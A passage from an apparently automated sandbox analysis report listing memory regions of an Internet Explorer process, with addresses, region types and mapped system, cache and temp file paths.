"c:\\users\\keecfmwgj\\appdata\\roaming\\microsoft\\windows\\cookies\\index.dat") Region: id = 2233 start_va = 0x190000 end_va = 0x197fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\history\\history.ie5\\index.dat") Region: id = 2234 start_va = 0x1a0000 end_va = 0x1a7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "urlmon.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\urlmon.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\urlmon.dll.mui") Region: id = 2235 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 2236 start_va = 0x1c0000 end_va = 0x1fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 2237 start_va = 0x200000 end_va = 0x200fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 2238 start_va = 0x210000 end_va = 0x210fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 2239 start_va = 0x220000 end_va = 0x220fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000220000" filename = "" Region: id = 2240 start_va = 0x230000 end_va = 0x230fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 2241 start_va = 0x240000 end_va = 0x241fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 2242 start_va = 0x250000 end_va = 0x251fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 2243 start_va = 0x260000 end_va = 0x261fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 2244 start_va = 0x270000 end_va = 0x315fff monitored = 0 entry_point = 0x271c9a region_type = mapped_file name = "iexplore.exe" filename = "\\Program Files (x86)\\Internet Explorer\\iexplore.exe" (normalized: "c:\\program files (x86)\\internet explorer\\iexplore.exe") Region: id = 2245 start_va = 0x320000 end_va = 0x41ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000320000" filename = "" Region: id = 2246 start_va = 0x420000 end_va = 0x420fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000420000" filename = "" Region: id = 2247 start_va = 0x430000 end_va = 0x52ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 2248 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000530000" filename = "" Region: id = 2249 start_va = 0x540000 end_va = 0x55ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 2250 start_va = 0x560000 end_va = 0x59ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 2251 start_va = 0x5a0000 end_va = 0x60dfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005a0000" filename = "" Region: id = 2252 start_va = 0x610000 end_va = 0x610fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000610000" filename = "" Region: id = 2253 start_va = 0x620000 end_va = 0x621fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 2254 start_va = 0x630000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 2255 start_va = 0x6b0000 end_va = 0x727fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006b0000" filename = "" Region: id = 2256 start_va = 0x730000 end_va = 0x734fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "user32.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\user32.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\user32.dll.mui") Region: id = 2257 start_va = 0x740000 end_va = 0x740fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 2258 start_va = 0x790000 end_va = 0x791fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000790000" filename = "" Region: id = 2259 start_va = 0x7a0000 end_va = 0x7a0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007a0000" filename = "" Region: id = 2260 start_va = 0x7b0000 end_va = 0x8affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007b0000" filename = "" Region: id = 2261 start_va = 0x8b0000 end_va = 0xa37fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008b0000" filename = "" Region: id = 2262 start_va = 0xa40000 end_va = 0xa40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a40000" filename = "" Region: id = 2263 start_va = 0xa50000 end_va = 0xa8ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a50000" filename = "" Region: id = 2264 start_va = 0xa90000 end_va = 0xa9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000a90000" filename = "" Region: id = 2265 start_va = 0xaa0000 end_va = 0xc20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000aa0000" filename = "" Region: id = 2266 start_va = 0xc30000 end_va = 0x202ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000c30000" filename = "" Region: id = 2267 start_va = 0x2030000 end_va = 0x22fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2268 start_va = 0x2300000 end_va = 0x23defff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 2269 start_va = 0x23e0000 end_va = 0x23e2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 2270 start_va = 0x23f0000 end_va = 0x23f2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023f0000" filename = "" Region: id = 2271 start_va = 0x2400000 end_va = 0x24fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002400000" filename = "" Region: id = 2272 start_va = 0x2500000 end_va = 0x255cfff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002500000" filename = "" Region: id = 2273 start_va = 0x2560000 end_va = 0x2560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 2274 start_va = 0x2570000 end_va = 0x25affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002570000" filename = "" Region: id = 2275 start_va = 0x25b0000 end_va = 0x25b2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025b0000" filename = "" Region: id = 2276 start_va = 0x25c0000 end_va = 0x25c2fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025c0000" filename = "" Region: id = 2277 start_va = 0x25d0000 end_va = 0x260ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000025d0000" filename = "" Region: id = 2278 start_va = 0x2610000 end_va = 0x2610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002610000" filename = "" Region: id = 2279 start_va = 0x2620000 end_va = 0x265ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002620000" filename = "" Region: id = 2280 start_va = 0x2660000 end_va = 0x269ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002660000" filename = "" Region: id = 2281 start_va = 0x26a0000 end_va = 0x26a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026a0000" filename = "" Region: id = 2282 start_va = 0x26f0000 end_va = 0x2701fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000026f0000" filename = "" Region: id = 2283 start_va = 0x2710000 end_va = 0x274ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002710000" filename = "" Region: id = 2284 start_va = 0x2750000 end_va = 0x2750fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002750000" filename = "" Region: id = 2285 start_va = 0x2760000 end_va = 0x2760fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002760000" filename = "" Region: id = 2286 start_va = 0x2770000 end_va = 0x2770fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002770000" filename = "" Region: id = 2287 start_va = 0x2780000 end_va = 0x27bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002780000" filename = "" Region: id = 2288 start_va = 0x27c0000 end_va = 0x27c3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027c0000" filename = "" Region: id = 2289 start_va = 0x27d0000 end_va = 0x27dcfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "setupapi.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\setupapi.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\setupapi.dll.mui") Region: id = 2290 start_va = 0x27e0000 end_va = 0x27e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000027e0000" filename = "" Region: id = 2291 start_va = 0x28f0000 end_va = 0x28f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000028f0000" filename = "" Region: id = 2292 start_va = 0x2900000 end_va = 0x29fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2293 start_va = 0x2a00000 end_va = 0x2a00fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a00000" filename = "" Region: id = 2294 start_va = 0x2a10000 end_va = 0x2a1dfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a10000" filename = "" Region: id = 2295 start_va = 0x2a20000 end_va = 0x2b1ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a20000" filename = "" Region: id = 2296 start_va = 0x2b20000 end_va = 0x2b20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002b20000" filename = "" Region: id = 2297 start_va = 0x2b70000 end_va = 0x2b86fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000007.db" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x0000000000000007.db") Region: id = 2298 start_va = 0x2b90000 end_va = 0x2b90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002b90000" filename = "" Region: id = 2299 start_va = 0x2ba0000 end_va = 0x2ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ba0000" filename = "" Region: id = 2300 start_va = 0x2bb0000 end_va = 0x2beffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bb0000" filename = "" Region: id = 2301 start_va = 0x2bf0000 end_va = 0x2bf0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002bf0000" filename = "" Region: id = 2302 start_va = 0x2c40000 end_va = 0x2c40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c40000" filename = "" Region: id = 2303 start_va = 0x2c50000 end_va = 0x2c50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c50000" filename = "" Region: id = 2304 start_va = 0x2c60000 end_va = 0x2c60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c60000" filename = "" Region: id = 2305 start_va = 0x2c70000 end_va = 0x2d6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002c70000" filename = "" Region: id = 2306 start_va = 0x2d70000 end_va = 0x2d70fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002d70000" filename = "" Region: id = 2307 start_va = 0x2e80000 end_va = 0x2e80fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e80000" filename = "" Region: id = 2308 start_va = 0x2e90000 end_va = 0x2e90fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002e90000" filename = "" Region: id = 2309 start_va = 0x2ea0000 end_va = 0x2ea0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ea0000" filename = "" Region: id = 2310 start_va = 0x2eb0000 end_va = 0x2eb0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002eb0000" filename = "" Region: id = 2311 start_va = 0x2ec0000 end_va = 0x2ec0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ec0000" filename = "" Region: id = 2312 start_va = 0x2ed0000 end_va = 0x2ed0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ed0000" filename = "" Region: id = 2313 start_va = 0x2ee0000 end_va = 0x2ee0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ee0000" filename = "" Region: id = 2314 start_va = 0x2ef0000 end_va = 0x2f2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002ef0000" filename = "" Region: id = 2315 start_va = 0x2f30000 end_va = 0x2f30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f30000" filename = "" Region: id = 2316 start_va = 0x2f40000 end_va = 0x2f40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f40000" filename = "" Region: id = 2317 start_va = 0x2f50000 end_va = 0x2f50fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f50000" filename = "" Region: id = 2318 start_va = 0x2f60000 end_va = 0x2f60fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f60000" filename = "" Region: id = 2319 start_va = 0x2f70000 end_va = 0x306ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002f70000" filename = "" Region: id = 2320 start_va = 0x3070000 end_va = 0x3070fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003070000" filename = "" Region: id = 2321 start_va = 0x3080000 end_va = 0x317ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003080000" filename = "" Region: id = 2322 start_va = 0x3180000 end_va = 0x318ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003180000" filename = "" Region: id = 2323 start_va = 0x3190000 end_va = 0x32bffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ieframe.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\ieframe.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\ieframe.dll.mui") Region: id = 2324 start_va = 0x32c0000 end_va = 0x32c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032c0000" filename = "" Region: id = 2325 start_va = 0x32d0000 end_va = 0x32d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032d0000" filename = "" Region: id = 2326 start_va = 0x32e0000 end_va = 0x32e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032e0000" filename = "" Region: id = 2327 start_va = 0x32f0000 end_va = 0x32f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000032f0000" filename = "" Region: id = 2328 start_va = 0x3300000 end_va = 0x3300fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003300000" filename = "" Region: id = 2329 start_va = 0x3310000 end_va = 0x3310fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003310000" filename = "" Region: id = 2330 start_va = 0x3320000 end_va = 0x332ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003320000" filename = "" Region: id = 2331 start_va = 0x3330000 end_va = 0x33affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003330000" filename = "" Region: id = 2332 start_va = 0x33b0000 end_va = 0x33b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033b0000" filename = "" Region: id = 2333 start_va = 0x33c0000 end_va = 0x33c0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033c0000" filename = "" Region: id = 2334 start_va = 0x33d0000 end_va = 0x33d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033d0000" filename = "" Region: id = 2335 start_va = 0x33e0000 end_va = 0x33e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033e0000" filename = "" Region: id = 2336 start_va = 0x33f0000 end_va = 0x33f0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000033f0000" filename = "" Region: id = 2337 start_va = 0x3400000 end_va = 0x34fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003400000" filename = "" Region: id = 2338 start_va = 0x3500000 end_va = 0x3500fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003500000" filename = "" Region: id = 2339 start_va = 0x3510000 end_va = 0x3510fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003510000" filename = "" Region: id = 2340 start_va = 0x3520000 end_va = 0x3520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003520000" filename = "" Region: id = 2341 start_va = 0x3530000 end_va = 0x3533fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2342 start_va = 0x3540000 end_va = 0x3540fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003540000" filename = "" Region: id = 2343 start_va = 0x3590000 end_va = 0x3591fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003590000" filename = "" Region: id = 2344 start_va = 0x35a0000 end_va = 0x35a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035a0000" filename = "" Region: id = 2345 start_va = 0x35b0000 end_va = 0x35cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035b0000" filename = "" Region: id = 2346 start_va = 0x35d0000 end_va = 0x35d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035d0000" filename = "" Region: id = 2347 start_va = 0x35e0000 end_va = 0x35e0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000035e0000" filename = "" Region: id = 2348 start_va = 0x35f0000 end_va = 0x35fdfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000035f0000" filename = "" Region: id = 2349 start_va = 0x3600000 end_va = 0x3600fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003600000" filename = "" Region: id = 2350 start_va = 0x3610000 end_va = 0x3610fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003610000" filename = "" Region: id = 2351 start_va = 0x3620000 end_va = 0x3620fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003620000" filename = "" Region: id = 2352 start_va = 0x3630000 end_va = 0x3630fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003630000" filename = "" Region: id = 2353 start_va = 0x3640000 end_va = 0x3643fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 2354 start_va = 0x3750000 end_va = 0x377ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000000e.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x000000000000000e.db") Region: id = 2355 start_va = 0x3780000 end_va = 0x3781fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003780000" filename = "" Region: id = 2356 start_va = 0x3790000 end_va = 0x3797fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "index.dat" filename = "\\Users\\kEecfMwgj\\AppData\\Local\\Microsoft\\Feeds Cache\\index.dat" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\microsoft\\feeds cache\\index.dat") Region: id = 2357 start_va = 0x37a0000 end_va = 0x389ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000037a0000" filename = "" Region: id = 2358 start_va = 0x38a0000 end_va = 0x3925fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000038a0000" filename = "" Region: id = 2359 start_va = 0x3a30000 end_va = 0x3b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003a30000" filename = "" Region: id = 2360 start_va = 0x3b30000 end_va = 0x3b95fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000002.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000002.db") Region: id = 2361 start_va = 0x3ba0000 end_va = 0x3ba0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003ba0000" filename = "" Region: id = 2362 start_va = 0x3bb0000 end_va = 0x3bb1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000003bb0000" filename = "" Region: id = 2363 start_va = 0x3cc0000 end_va = 0x3d3ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~df08c0e08c84f65f93.tmp" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DF08C0E08C84F65F93.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~df08c0e08c84f65f93.tmp") Region: id = 2364 start_va = 0x3d40000 end_va = 0x3dbffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~dfd4e052923a5d2d4d.tmp" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DFD4E052923A5D2D4D.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dfd4e052923a5d2d4d.tmp") Region: id = 2365 start_va = 0x3dc0000 end_va = 0x3dc0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "msxml3r.dll" filename = "\\Windows\\SysWOW64\\msxml3r.dll" (normalized: "c:\\windows\\syswow64\\msxml3r.dll") Region: id = 2366 start_va = 0x3dd0000 end_va = 0x3deffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003dd0000" filename = "" Region: id = 2367 start_va = 0x3e30000 end_va = 0x3e6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000003e30000" filename = "" Region: id = 2368 start_va = 0x3e70000 end_va = 0x479ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 2369 start_va = 0x47f0000 end_va = 0x482ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000047f0000" filename = "" Region: id = 2370 start_va = 0x4830000 end_va = 0x48affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~dff5da3beb8485d11a.tmp" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DFF5DA3BEB8485D11A.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~dff5da3beb8485d11a.tmp") Region: id = 2371 start_va = 0x48e0000 end_va = 0x49dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000048e0000" filename = "" Region: id = 2372 start_va = 0x49e0000 end_va = 0x4ddffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000049e0000" filename = "" Region: id = 2373 start_va = 0x4de0000 end_va = 0x4e9ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2374 start_va = 0x4ea0000 end_va = 0x4edffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004ea0000" filename = "" Region: id = 2375 start_va = 0x4ee0000 end_va = 0x4f5ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "~df8af88d6cad72b104.tmp" filename = "\\Users\\KEECFM~1\\AppData\\Local\\Temp\\~DF8AF88D6CAD72B104.TMP" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\~df8af88d6cad72b104.tmp") Region: id = 2376 start_va = 0x4f80000 end_va = 0x4fbffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004f80000" filename = "" Region: id = 2377 start_va = 0x5120000 end_va = 0x515ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005120000" filename = "" Region: id = 2378 start_va = 0x5160000 end_va = 0x555ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000005160000" filename = "" Region: id = 2379 start_va = 0x5560000 end_va = 0x595ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005560000" filename = "" Region: id = 2380 start_va = 0x5960000 end_va = 0x6323fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005960000" filename = "" Region: id = 2381 start_va = 0x5fff0000 end_va = 0x5fffffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000005fff0000" filename = "" Region: id = 2382 start_va = 0x72b80000 end_va = 0x72cb2fff monitored = 0 entry_point = 0x72b8145e region_type = mapped_file name = "msxml3.dll" filename = "\\Windows\\SysWOW64\\msxml3.dll" (normalized: "c:\\windows\\syswow64\\msxml3.dll") Region: id = 2383 start_va = 0x72ce0000 end_va = 0x72d3efff monitored = 0 entry_point = 0x72ce2134 region_type = mapped_file name = "sxs.dll" filename = "\\Windows\\SysWOW64\\sxs.dll" (normalized: "c:\\windows\\syswow64\\sxs.dll") Region: id = 2384 start_va = 0x73620000 end_va = 0x7364dfff monitored = 0 entry_point = 0x736216ed region_type = mapped_file name = "mlang.dll" filename = "\\Windows\\SysWOW64\\mlang.dll" (normalized: "c:\\windows\\syswow64\\mlang.dll") Region: id = 2385 start_va = 0x73690000 end_va = 0x73725fff monitored = 0 entry_point = 0x7369161e region_type = mapped_file name = "msfeeds.dll" filename = "\\Windows\\SysWOW64\\msfeeds.dll" (normalized: "c:\\windows\\syswow64\\msfeeds.dll") Region: id = 2386 start_va = 0x73730000 end_va = 0x73759fff monitored = 0 entry_point = 0x737310ed region_type = mapped_file name = "msls31.dll" filename = "\\Windows\\SysWOW64\\msls31.dll" (normalized: "c:\\windows\\syswow64\\msls31.dll") Region: id = 2387 start_va = 0x73760000 end_va = 0x73d16fff monitored = 0 entry_point = 0x7376bffb region_type = mapped_file name = "mshtml.dll" filename = "\\Windows\\SysWOW64\\mshtml.dll" (normalized: "c:\\windows\\syswow64\\mshtml.dll") Region: id = 2388 start_va = 0x73d20000 end_va = 0x73dd1fff monitored = 0 entry_point = 0x73d716fd region_type = mapped_file name = "dui70.dll" filename = "\\Windows\\SysWOW64\\dui70.dll" (normalized: "c:\\windows\\syswow64\\dui70.dll") Region: id = 2389 start_va = 0x73de0000 end_va = 0x73e0efff monitored = 0 entry_point = 0x73dec7a2 region_type = mapped_file name = "duser.dll" filename = "\\Windows\\SysWOW64\\duser.dll" (normalized: "c:\\windows\\syswow64\\duser.dll") Region: id = 2390 start_va = 0x73e10000 end_va = 0x73f7efff monitored = 0 entry_point = 0x73e1d50e region_type = mapped_file name = "explorerframe.dll" filename = "\\Windows\\SysWOW64\\ExplorerFrame.dll" (normalized: "c:\\windows\\syswow64\\explorerframe.dll") Region: id = 2391 start_va = 0x73f80000 end_va = 0x74074fff monitored = 0 entry_point = 0x73f90d9e region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\SysWOW64\\propsys.dll" (normalized: "c:\\windows\\syswow64\\propsys.dll") Region: id = 2392 start_va = 0x740a0000 end_va = 0x740cefff monitored = 0 entry_point = 0x740a1142 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\SysWOW64\\xmllite.dll" (normalized: "c:\\windows\\syswow64\\xmllite.dll") Region: id = 2393 start_va = 0x740d0000 end_va = 0x7411bfff monitored = 0 entry_point = 0x740d2c14 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\SysWOW64\\apphelp.dll" (normalized: "c:\\windows\\syswow64\\apphelp.dll") Region: id = 2394 start_va = 0x74120000 end_va = 0x7414afff monitored = 0 entry_point = 0x7413d3fe region_type = mapped_file name = "ieproxy.dll" filename = "\\Program Files (x86)\\Internet Explorer\\ieproxy.dll" (normalized: "c:\\program files (x86)\\internet explorer\\ieproxy.dll") Region: id = 2395 start_va = 0x74150000 end_va = 0x7418afff monitored = 0 entry_point = 0x7415128d region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\SysWOW64\\rsaenh.dll" (normalized: "c:\\windows\\syswow64\\rsaenh.dll") Region: id = 2396 